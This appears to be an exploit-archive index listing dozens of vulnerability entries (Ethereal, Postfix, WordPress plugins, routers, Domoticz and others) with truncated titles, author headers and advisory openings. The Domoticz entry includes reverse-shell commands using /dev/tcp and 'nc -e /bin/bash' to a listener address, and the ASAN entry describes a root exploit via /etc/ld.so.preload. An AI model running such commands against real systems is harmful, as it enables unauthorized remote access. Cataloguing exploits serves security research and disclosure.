Ethereal 10.x - AFP Protocol Dissector Remote Format String

Ethereal 10.x - AFP Protocol Dissector Remote Format String / etherealv0.10.: AFP remote format string exploit. by: vade79/v9 [email protected] fakehalo/realhalo compile: gcc xethereal-afp-fmt.c -o xethereal-afp-fmt ethereal homepage/url: http://www.ethereal.com syntax: ./xethereal-afp-fmt -spSrPanc...

Real Server 789 (Windows Linux) - Remote Code Execution

Real Server 789 Windows Linux - Remote Code Execution / / THCREALbad 0.4 - Wind0wZ & Linux remote root exploit / Exploit by: Johnny Cyberpunk thehackerschoice / THC PUBLIC SOURCE MATERIALS / / http://www.service.real.com/help/faq/security/rootexploit082203.html / / After successful exploitation o...

Postfix 1.1.x - Denial of Service (2)

Postfix 1.1.x - Denial of Service 2 source: https://www.securityfocus.com/bid/8333/info Debian has reported two vulnerabilities in the Postfix mail transfer agent. The first vulnerability, CAN-2003-0468, can allow for an adversary to "bounce-scan" a private network. It has also been reported that...

Valve Software Half-Life Server 1.1.1.03.1.1.1c14.1.1.1a - Multiplayer Request Buffer Overflow

Valve Software Half-Life Server 1.1.1.03.1.1.1c14.1.1.1a - Multiplayer Request Buffer Overflow // source: https://www.securityfocus.com/bid/8300/info // Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the softwa...

phpBB2 Gender Mod 1.1.3 - SQL Injection

phpBB2 Gender Mod 1.1.3 - SQL Injection source: https://www.securityfocus.com/bid/5342/info phpBB2 is an open-source web forum application that is written in PHP and backended by a number of database products. It will run on most Unix and Linux variants, as well as Microsoft Windows operating...

Canna Canna 3.5 b2 - Remote Buffer Overflow

Canna Canna 3.5 b2 - Remote Buffer Overflow // source: https://www.securityfocus.com/bid/1445/info A vulnerability exists in the 'canna' package, as distributed with a number of free operating systems, and available for other systems. Version 3.5b2 is vulnerable. It is assumed versions prior to...

ColdFusion Server 2.03.x4.x - Administrator Login Password Denial of Service

ColdFusion Server 2.03.x4.x - Administrator Login Password Denial of Service source: https://www.securityfocus.com/bid/1314/info Due to a faulty mechanism in the password parsing implementation in authentication requests, it is possible to launch a denial of service attack against Allaire...

Sun Solaris 7.0 - rpc.ttdbserver Denial of Service

Sun Solaris 7.0 - rpc.ttdbserver Denial of Service // source: https://www.securityfocus.com/bid/811/info It is possible to crash rpc.ttdbserver by using the old tddbserver buffer overflow exploit. This problem is caused by a NULL pointer being dereferenced when rpc function 15 is called with...

Trend Micro Interscan VirusWall 3.2.33.3 - HELO Remote Buffer Overflow (2)

Trend Micro Interscan VirusWall 3.2.33.3 - HELO Remote Buffer Overflow 2 source: https://www.securityfocus.com/bid/787/info There is a buffer overflow in the HELO command of the smtp gateway which ships as part of the VirusWall product. This buffer overflow could be used to launch arbitrary code ...

FreeBSD 2.x HP-UX 91011 Kernel 2.0.3 Windows NT 4.0Server 2003 NetBSD 1 - land.c loopback Denial of Service (1)

FreeBSD 2.x HP-UX 91011 Kernel 2.0.3 Windows NT 4.0Server 2003 NetBSD 1 - land.c loopback Denial of Service 1 / source: https://www.securityfocus.com/bid/2666/info A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and...

OpenTFTP 1.66 - Local Privilege Escalation

OpenTFTP 1.66 - Local Privilege Escalation Exploit Title: OpenTFTP 1.66 - Local Privilege Escalation Exploit Author: boku Date: 2020-02-12 Vendor Homepage: https://sourceforge.net/projects/tftp-server/ Software Link:...

Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting

Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting Exploit Title: Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting Exploit Author: Prasenjit Kanti Paul Vendor Homepage: https://www.forcepoint.com/ Software Link: https://www.forcepoint.com/product/cloud-security/web-security...

Hospital Management System 4.0 - Authentication Bypass

Hospital Management System 4.0 - Authentication Bypass Exploit Title: Hospital Management System 4.0 - Authentication Bypass Exploit Author: Metin Yunus Kandemir kandemir Vendor Homepage: https://phpgurukul.com/ Software Link: https://phpgurukul.com/hospital-management-system-in-php/ Version: v4....

nostromo 1.9.6 - Remote Code Execution

nostromo 1.9.6 - Remote Code Execution Exploit Title: nostromo 1.9.6 - Remote Code Execution Date: 2019-12-31 Exploit Author: Kr0ff Vendor Homepage: Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz Version: 1.9.6 Tested on: Debian CVE : CVE-2019-16278 cve201916278.py !/usr/bin/env...

Anviz CrossChex 4.3.12 - Local Buffer Overflow

Anviz CrossChex 4.3.12 - Local Buffer Overflow Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow Date: 2019-11-30 Exploit Author: Luis Catarino & Pedro Rodrigues Vendor Homepage: https://www.anviz.com/ Software Link: https://www.anviz.com/download.html Version: Crosschex Standard x86 ...

Ubuntu 19.10 - ubuntu-aufs-modified mmap_region() Breaks Refcounting in overlayfsshiftfs Error Path

Ubuntu 19.10 - ubuntu-aufs-modified mmapregion Breaks Refcounting in overlayfsshiftfs Error Path Tested on 19.10. Ubuntu's aufs kernel patch includes the following change which I interestingly can't see in the AUFS code at https://github.com/sfjro/aufs5-linux/blob/master/mm/mmap.c:...

Emerson PAC Machine Edition 9.70 Build 8595 - FxControlRuntime Unquoted Service Path

Emerson PAC Machine Edition 9.70 Build 8595 - FxControlRuntime Unquoted Service Path Exploit Title: Emerson PAC Machine Edition 9.70 Build 8595 - 'FxControlRuntime' Unquoted Service Path Discovery by: Luis Martinez Discovery Date: 2019-11-17 Vendor Homepage: https://www.emerson.com/en-us Software...

Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal

Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal Exploit Title: Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal Google Dork: N/A​ Date: 2019​-11-15 Exploit Author: Kevin Randall​ Vendor Homepage: https://www.lexmark.com/enus.html​ Software Link:...

nipper-ng 0.11.10 - Remote Buffer Overflow (PoC)

nipper-ng 0.11.10 - Remote Buffer Overflow PoC Exploit Title: nipper-ng 0.11.10 - Remote Buffer Overflow PoC Date: 2019-10-20 Exploit Author: Guy Levin https://blog.vastart.dev Vendor Homepage: https://tools.kali.org/reporting-tools/nipper-ng Software Link:...

Nextcloud 17 - Cross-Site Request Forgery

Nextcloud 17 - Cross-Site Request Forgery Exploit Title: Nextcloud 17 - Cross-Site Request Forgery Date: 08.11.2019 Exploit Author: Ozer Goker Vendor Homepage: https://nextcloud.com Software Link: https://nextcloud.com/install/instructions-server Version: 17 CVE: N/A Nextcloud offers the...

HPE Intelligent Management Center 7.3 E0506P09 - Information Disclosure

HPE Intelligent Management Center 7.3 E0506P09 - Information Disclosure !/opt/local/bin/python2.7 Exploit Title: HPE Intelligent Management Center dbman Command 10001 Information Disclosure Date: 22-09-2019 Exploit Author: Rishabh Sharma Linkedin: rishabh2241991 Vendor Homepage: www.hpe.com...

Alkacon OpenCMS 10.5.x - Cross-Site Scripting

Alkacon OpenCMS 10.5.x - Cross-Site Scripting Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Apollo Template Google Dork: N/A Date: 18/07/2019 Exploit Author: Aetsu Vendor Homepage: http://www.opencms.org Software Link: https://github.com/alkacon/apollo-template Version: 10.5.x Tested on...

SQLiteManager 1.2.0 1.2.4 - Blind SQL Injection

SQLiteManager 1.2.0 1.2.4 - Blind SQL Injection !-- Exploit Title: Blind SQL injection in SQLiteManager 1.2.0 and 1.2.4 Date: 17-02-2019 Exploit Author: Rafael Pedrero Vendor Homepage: http://www.sqlitemanager.org/ Software Link: http://www.sqlitemanager.org/ Version: SQLiteManager 1.2.0 and 1.2....

1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting

1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting 1CRM On-Premise Software 8.5.7 Stored XSS //////////////////////////////////////////////////////////////////////////////////// Exploit Title: 1CRM On-Premise Software 8.5.7 - Cross-Site Scripting Date: 19/07/2019 Exploit Author: Kus...

Ovidentia 8.4.3 - SQL Injection

Ovidentia 8.4.3 - SQL Injection ------------------------------------------------------- Exploit Title: Ovidentia CMS - SQL Injection Authenticated Date: 06/05/2019 CVE: CVE-2019-13978 Exploit Author: Fernando Pinheiro n3k00n3 Victor Flores UserX Vendor Homepage: https://www.ovidentia.org/ Version...

Axway SecureTransport 5 - Unauthenticated XML Injection

Axway SecureTransport 5 - Unauthenticated XML Injection Title: Axway SecureTransport 5 - Unauthenticated XML Injection Google Dork: intitle:"Axway SecureTransport" "Login" Date: 2019-07-20 Author: Dominik Penner / zer0pwn of Underdog Security Vendor Homepage: https://www.axway.com/en Software Lin...

Microsoft DirectWrite AFDKO - Out-of-Bounds Read in OpenType Font Handling Due to Undefined FontName Index

Microsoft DirectWrite AFDKO - Out-of-Bounds Read in OpenType Font Handling Due to Undefined FontName Index -----===== Background =====----- AFDKO Adobe Font Development Kit for OpenType is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling...

BlogEngine.NET 3.3.63.3.7 - path Directory Traversal

BlogEngine.NET 3.3.63.3.7 - path Directory Traversal Exploit Title: Directory Traversal on BlogEngine.NET Date: 24 Jun 2019 Exploit Author: Aaron Bishop Vendor Homepage: https://blogengine.io/ Version: v3.3.7 Tested on: 3.3.7, 3.3.6 CVE : 2019-10717 1. Description ============== BlogEngine.NET is...

HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write

HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/HC10-HC.SERVER-10.14-REMOTE-INVALID-POINTER-WRITE.txt + ISR: ApparitionSec Vendor www.hostingcontroller.com Produ...

WordPress Plugin Form Maker 1.13.3 - SQL Injection

WordPress Plugin Form Maker 1.13.3 - SQL Injection -- coding: utf-8 -- Exploit Title: WordPress Plugin Form Maker 1.13.3 - SQL Injection Date: 22-03-2019 Exploit Author: Daniele Scanu @ Certimeter Group Vendor Homepage: https://10web.io/plugins/ Software Link:...

Interspire Email Marketer 6.20 - surveys_submit.php Remote Code Execution

Interspire Email Marketer 6.20 - surveyssubmit.php Remote Code Execution Exploit Title: Interspire Email Marketer 6.20 - Remote Code Execution Date: May 2019 Exploit Author: Numan Türle Vendor Homepage: https://www.interspire.com Software Link: https://www.interspire.com/emailmarketer Version: 6....

WeChat for Android 7.0.4 - vcodec2_hls_filter Denial of Service

WeChat for Android 7.0.4 - vcodec2hlsfilter Denial of Service Exploit Title: DoS Wechat with an emoji Date: 16-May-2019 Exploit Author: Hong Nhat Pham Vendor Homepage: http://www.tencent.com/en-us/index.html Software Link: https://play.google.com/store/apps/details?id=com.tencent.mm Version: 7.0....

SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)

SOCA Access Control System 180612 - Cross-Site Request Forgery Add Admin SOCA Access Control System 180612 CSRF Add Admin Exploit Vendor: SOCA Technology Co., Ltd Product web page: http://www.socatech.com Affected version: 180612, 170000 and 141007 Summary: The company's products include Proximit...

Domoticz 4.10577 - Unauthenticated Remote Command Execution

Domoticz 4.10577 - Unauthenticated Remote Command Execution !/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse...

Netwide Assembler (NASM) 2.14rc15 - NULL Pointer Dereference (PoC)

Netwide Assembler NASM 2.14rc15 - NULL Pointer Dereference PoC Exploit Title: Netwide Assembler NASM 2.14rc15 NULL Pointer Dereference PoC Date: 2018-09-05 Exploit Author: Fakhri Zulkifli Vendor Homepage: https://www.nasm.us/ Software Link: https://www.nasm.us/pub/nasm/releasebuilds/?C=M;O=D...

Clinic Pro v4 - month SQL Injection

Clinic Pro v4 - month SQL Injection Title: Clinic Pro - Clinic Management Software Date: 03.04.2019 Exploit Author: Abdullah Çelebi Vendor Homepage: https://softwebinternational.com Software Link: https://cms.softwebinternational.com Category: Webapps Tested on: WAMPP @Win Software description: I...

PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery

PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Cross-Site Request Forgery CSRF Date: 14/01/2019 Exploit Author: Kumar Saurav Reference:...

devolo dLAN 550 duo+ Starter Kit - Remote Code Execution

devolo dLAN 550 duo+ Starter Kit - Remote Code Execution devolo dLAN 550 duo+ Starter Kit Remote Code Execution Vendor: devolo AG Product web page: https://www.devolo.com Affected version: dLAN 500 AV Wireless+ 3.1.0-1 i386 Summary: Devolo dLAN® 550 duo+ Starter Kit is Powerlineadapter which is a...

Zyxel NBG-418N v2 Modem 1.00(AAXM.6)C0 - Cross-Site Request Forgery

Zyxel NBG-418N v2 Modem 1.00AAXM.6C0 - Cross-Site Request Forgery NBG-418N v2 Modem CSRF Exploit & PoC...

ASANSUID - Local Privilege Escalation

ASANSUID - Local Privilege Escalation !/bin/bash unsanitary.sh - ASAN/SUID Local Root Exploit Exploits er, unsanitized env var passing in ASAN which leads to file clobbering as root when executing setuid root binaries compiled with ASAN. Uses an overwrite of /etc/ld.so.preload to get root on a...

ZTE MF65 BD_HDV6MF65V1.0.0B05 - Cross-Site Scripting

ZTE MF65 BDHDV6MF65V1.0.0B05 - Cross-Site Scripting Exploit Title: Reflected Cross-Site Scripting on ZTE MF65 Date: 01/09/2019 Exploit Author: Nathu Nandwani Website: http://nandtech.co/ Vendor Homepage: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009483 Version:...

BlogEngine 3.3 - XML External Entity Injection

BlogEngine 3.3 - XML External Entity Injection XML External Entity Injection Vulnerability in BlogEngine 3.3 Information -------------------- Advisory by Netsparker Name: XML External Entity Injection Vulnerability in BlogEngine 3.3 Affected Software: BlogEngine Affected Versions: 3.3 Homepage:...

GDB-Connector

GDB Connector is a remote script to use for controlling a remote target and debug an exploit on a target directly from Exploit Pack. Copy this script to your target and execute it to connect back to your framework. Shell Script created using Exploit Pack http://www.exploitpack.com -...

Apache Superset 0.23 - Remote Code Execution

Apache Superset 0.23 - Remote Code Execution Exploit Title: Apache Superset ' sys.exit else: Script arguments supersetIP = sys.argv1 supersetPort = sys.argv2 Verify these URLs match your environment loginURL = 'http://' + supersetIP + ':' + supersetPort + '/login/' uploadURL = 'http://' +...

ServersCheck Monitoring Software 14.3.3 - Arbitrary File Write

ServersCheck Monitoring Software 14.3.3 - Arbitrary File Write Exploit Title: ServersCheck Monitoring Software 14.3.3 - Denial of Service PoC Author: John Page aka hyp3rlinx Date: 2018-10-23 Vendor: www.serverscheck.com Software Link: http://downloads.serverscheck.com/monitoringsoftware/setup.exe...

D-Link Routers - Command Injection

D-Link Routers - Command Injection Shell command injection CVE: CVE-2018-10823 CVSS v3: 9.1 AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H Description: An issue was discovered on D-Link routers: DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02,...

Airties AIR5342 1.0.0.18 - Cross-Site Scripting

Airties AIR5342 1.0.0.18 - Cross-Site Scripting Exploit Title: Airties AIR5342 1.0.0.18 - Cross-Site Scripting Date: 25-09-2018 Exploit Author: Ismail Tasdelen Vendor Homepage: https://www.airties.com/ Software http://www.airties.com.tr/support/dcenter/ Version: 1.0.0.18 Affected products: AIR534...

Argus Surveillance DVR 4.0.0.0 - Directory Traversal

Argus Surveillance DVR 4.0.0.0 - Directory Traversal Exploit: Argus Surveillance DVR 4.0.0.0 - Directory Traversal Author: John Page aka hyp3rlinx Date: 2018-08-28 Vendor: www.argussurveillance.com Software Link: http://www.argussurveillance.com/download/DVRstp.exe CVE: N/A Description: Argus...

Hikvision IP Camera 5.4.0 - User Enumeration (Metasploit)

Hikvision IP Camera 5.4.0 - User Enumeration Metasploit Exploit title: Hikvision IP Camera 5.4.0 - User Enumeration Metasploit Author: Alfie Date: 2018-08-21 Website: https://www.hikvision.com/en/ Software: Hikvision Camera Versions: DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 16053...

Microsoft DirectX SDK - Xact.exe Remote Code Execution

Microsoft DirectX SDK - Xact.exe Remote Code Execution + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-DIRECTX-SDK-XACT.EXE-TROJAN-FILE-CODE-EXECUTION.txt + ISR: Apparition Security Greetz: indoushka | Eduardo...